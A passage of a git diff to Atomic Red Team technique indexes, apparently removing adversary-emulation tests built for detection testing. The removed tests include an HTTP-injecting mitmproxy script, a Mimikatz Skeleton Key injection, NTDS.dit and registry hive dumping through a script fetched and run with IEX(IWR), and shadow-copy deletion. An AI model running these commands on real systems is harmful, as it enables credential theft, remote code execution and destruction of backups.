get_prereq_command: 'winget install --id cURL.cURL -e
'
- description: mitmproxy must be installed and in PATH
prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'python -m pip install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
| Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
-like "*mitmdump*" }) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
atomic_tests: []
T1205:
technique:
type: attack-pattern
@@ -83627,6 +81829,7 @@ collection:
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
description: |
Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
supported_platforms:
- windows
@@ -83668,45 +81871,6 @@ collection:
'
name: powershell
elevation_required: true
- name: RDP Bitmap Cache Extraction via bmc-tools
auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
description: |
Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
supported_platforms:
- windows
input_arguments:
cache_path:
description: Path to the RDP Cache directory or specific .bmc file
type: path
default: "$env:LOCALAPPDATA\\Microsoft\\Terminal Server Client\\Cache"
output_dir:
description: Directory to save reconstructed images
type: path
default: "$env:TEMP\\rdp_screens"
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and in the PATH to run bmc-tools.py
'
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "Please install Python manually."
'
executor:
name: powershell
elevation_required: false
command: "$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'\n$toolsDir
= \"$env:TEMP\\bmc-tools.py\"\n \n# create output directory\nNew-Item -ItemType
Directory -Path #{output_dir} -Force | Out-Null\n\n# python script download\n&
curl.exe -L $url --output $toolsDir\n \n# execution step\nif (Test-Path
$toolsDir) { python $toolsDir -s \"#{cache_path}\" -d #{output_dir} -b }\n"
cleanup_command: |
Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
T1557:
technique:
type: attack-pattern
@@ -99718,7 +97882,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -99748,54 +97912,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1556.005:
technique:
type: attack-pattern
@@ -100276,62 +98393,6 @@ credential-access:
diskshadow.exe /s #{filename}
name: command_prompt
elevation_required: true
- name: Copy NTDS in low level NTFS acquisition via MFT parsing
auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
- name: Copy NTDS in low level NTFS acquisition via fsutil
auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
T1558.003:
technique:
type: attack-pattern
@@ -100768,7 +98829,8 @@ credential-access:
'
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force
'
@@ -102008,61 +100070,6 @@ discovery:
cleanup_command:
name: powershell
elevation_required: false
- name: Device Driver Discovery (Linux)
auto_generated_guid: d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1
description: 'Displays a list of loaded kernel modules on a Linux system, which
is used to enumerate drivers.
'
supported_platforms:
- linux
executor:
command: 'lsmod
'
name: bash
elevation_required: false
- name: Enumerate Kernel Driver Files (Linux)
auto_generated_guid: 13c0fef5-9be9-4d7f-9c6b-901624e53770
description: 'Finds and lists all kernel driver files on a Linux system in order
to provide a broader view of available drivers, not just loaded ones.
'
supported_platforms:
- linux
executor:
command: 'find /lib/modules/$(uname -r)/kernel/drivers -name "*.ko*"
'
name: bash
elevation_required: false
- name: List loaded kernel extensions (macOS)
auto_generated_guid: 71eab73d-5d7d-4681-9a72-7873489a5b85
description: 'Displays a list of loaded kernel extensions (kexts) on a macOS
system.
'
supported_platforms:
- macos
executor:
command: 'kextstat
'
name: bash
elevation_required: false
- name: Find Kernel Extensions (macOS)
auto_generated_guid: c63bbe52-6f17-4832-b221-f07ba8b1736f
description: 'Searches for kernel extension (kext) files on a macOS system.
'
supported_platforms:
- macos
executor:
command: 'kextfind
'
name: bash
elevation_required: false
T1087.002:
technique:
type: attack-pattern
@@ -103647,7 +101654,7 @@ discovery:
- windows
executor:
command: |
tasklist.exe /svc
tasklist.exe
sc query
sc query state= all
name: command_prompt
@@ -103695,62 +101702,6 @@ discovery:
executor:
name: command_prompt
command: powershell.exe Get-Service
- name: System Service Discovery - macOS launchctl
auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
description: |
Enumerates services on macOS using launchctl. Used by adversaries for
identifying daemons, background services, and persistence mechanisms.
supported_platforms:
- macos
executor:
name: sh
command: launchctl list
- name: System Service Discovery - Windows Scheduled Tasks (schtasks)
auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
description: 'Enumerates scheduled tasks on Windows using schtasks.exe.
'
supported_platforms:
- windows
executor:
name: command_prompt
command: schtasks /query /fo LIST /v
- name: System Service Discovery - Services Registry Enumeration
auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
description: |
Enumerates Windows services by reading the Services registry key
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
Manager APIs or CLI tools such as sc.exe or Get-Service.
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
ForEach-Object {
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
[PSCustomObject]@{
Name = $_.PSChildName
DisplayName = $p.DisplayName
ImagePath = $p.ImagePath
StartType = $p.Start
}
}
- name: System Service Discovery - Linux init scripts
auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
description: |
Enumerates system services by listing SysV init scripts and runlevel
symlinks under /etc/init.d and /etc/rc*.d.
supported_platforms:
- linux
executor:
name: sh
command: |
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
T1040:
technique:
type: attack-pattern
@@ -107413,20 +105364,20 @@ discovery:
description: |
Get a listing of network connections.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires
elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
supported_platforms:
- windows
executor:
command: |
netstat -ano
netstat
net use
net sessions 2>nul
net sessions
name: command_prompt
- name: System Network Connections Discovery with PowerShell
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
description: |
Get a listing of network connections.
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
supported_platforms:
- windows
@@ -107435,42 +105386,6 @@ discovery:
'
name: powershell
- name: System Network Connections Discovery via PowerShell (Process Mapping)
auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5
description: 'Enumerate TCP connections and map to owning process names via
PowerShell.
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
- name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
description: |
List active TCP/UDP network connections using ss, with lsof as a fallback
when ss is unavailable. Serves as an alternative to the netstat-based test.
supported_platforms:
- linux
- macos
executor:
name: bash
command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
-ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
fi
'
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
description: |
@@ -107497,19 +105412,6 @@ discovery:
netstat
who -a
name: sh
- name: System Network Connections Discovery via sockstat (Linux, FreeBSD)
auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b
description: 'Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
'
supported_platforms:
- linux
executor:
name: sh
command: |
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
- name: System Discovery using SharpView
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
description: "Get a listing of network connections, domains, domain users, and
@@ -119191,28 +117093,6 @@ impact:
'
name: sh
- name: Windows - Simulate CPU Load with PowerShell
auto_generated_guid: 44315fb0-f78d-4cef-b10f-cf21c1fe2c75
description: |
This test simulates high CPU load using PowerShell, commonly seen in resource hijacking.
Spawns background jobs to stress CPU cores for a specified duration.
supported_platforms:
- windows
input_arguments:
duration_seconds:
description: Duration in seconds to run the CPU stress test
type: integer
default: 30
cpu_threads:
description: Number of threads to stress (default 4)
type: integer
default: 4
executor:
command: |
$end = (Get-Date).AddSeconds(#{duration_seconds})
1..#{cpu_threads} | ForEach-Object { Start-Job { param($t) while((Get-Date) -lt $t) { $i=0; while($i -lt 200000){$i++} } } -ArgumentList $end }
Get-Job | Wait-Job | Remove-Job
name: powershell
T1565.002:
technique:
type: attack-pattern
@@ -119973,35 +117853,6 @@ impact:
cleanup_command: sudo tmutil enable
name: sh
elevation_required: true
- name: Windows - Delete Volume Shadow Copies via Diskshadow
auto_generated_guid: 42111a6f-7e7f-482c-9b1b-3cfd090b999c
description: 'Deletes Windows Volume Shadow Copies via Diskshadow binary. This
technique is used by numerous ransomware families such as Crytox. The binary
is present by default in Windows Server operating systems (since Windows Server
2008). Upon execution, it will delete all shadow copies of the server.
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Create volume shadow copy of C:\ . This prereq command only
works on Windows Server or Windows 8.
'
prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
that satisfy the query.")) { exit 0 } else { exit 1 }
'
get_prereq_command: 'vssadmin.exe create shadow /for=c:
'
executor:
command: '"delete shadows all" | diskshadow.exe
'
name: powershell
elevation_required: true
T1561.001:
technique:
type: attack-pattern
@@ -121394,126 +119245,7 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
- name: MITM Proxy Injection (Windows)
auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'winget install --id Python.Python.3 -e
'
- description: curl must be installed
prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'winget install --id cURL.cURL -e
'
- description: mitmproxy must be installed and in PATH
prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'python -m pip install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
| Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
-like "*mitmdump*" }) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
atomic_tests: []
T1078.001:
technique:
type: attack-pattern
atomics/Indexes/linux-index.yaml
+36 -1070
View File
@@ -1529,10 +1529,10 @@ defense-evasion:
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
Ignore
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
@@ -1547,59 +1547,15 @@ defense-evasion:
command: |-
$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
-ErrorAction Ignore
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
- name: Password-Protected ZIP Payload Extraction and Execution
auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
description: |
Extracts and executes a script from a password-protected ZIP archive.
This technique is commonly used by malware families like Emotet and QBot to deliver payloads
via email attachments where the password is provided in the message body.
The encrypted ZIP evades static file analysis until extracted at runtime.
Upon successful execution, displays confirmation and system information.
supported_platforms:
- linux
- macos
input_arguments:
zip_password:
description: Password used to protect the ZIP archive
type: String
default: infected
dependency_executor_name: bash
dependencies:
- description: 'zip and unzip must be installed
'
prereq_command: 'which zip && which unzip
'
get_prereq_command: 'echo "Install zip and unzip using your package manager
(apt-get, yum, or brew)"
'
executor:
command: |
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
cleanup_command: |
rm -f /tmp/art_payload.sh
rm -f /tmp/art_encrypted.zip
name: bash
T1014:
technique:
type: attack-pattern
@@ -15154,7 +15110,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -15184,7 +15140,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -24976,7 +24931,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -25012,102 +24967,7 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
